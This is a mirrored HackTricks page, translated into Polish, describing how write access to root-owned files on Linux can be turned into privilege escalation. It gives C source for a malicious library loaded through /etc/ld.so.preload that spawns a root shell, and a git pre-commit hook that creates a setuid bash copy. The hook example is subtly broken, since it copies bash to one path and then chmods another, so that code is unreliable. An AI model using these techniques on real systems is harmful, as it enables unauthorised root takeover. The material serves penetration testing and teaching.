Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/write-to-root.md
Translator workflow 5e0daf0e23 Translated to Polish
2024-02-11 01:46:25 +00:00

3.6 KiB
Raw Blame History

Dowolne zapisywanie plików do roota

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

/etc/ld.so.preload

Ten plik zachowuje się jak zmienna środowiskowa LD_PRELOAD, ale działa również w binariach SUID.
Jeśli możesz go utworzyć lub zmodyfikować, możesz po prostu dodać ścieżkę do biblioteki, która zostanie załadowana przy każdym wykonywanym binarnym pliku.

Na przykład: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hooks

Git hooks to skrypty, które są uruchamiane w różnych zdarzeniach w repozytorium git, takich jak tworzenie commita, scalanie... Jeśli uprzywilejowany skrypt lub użytkownik wykonuje te czynności często i jest możliwość zapisu w folderze .git, można to wykorzystać do przywilejów.

Na przykład, można wygenerować skrypt w repozytorium git w .git/hooks, aby był zawsze wykonywany przy tworzeniu nowego commita:

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

{% endcode %}

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: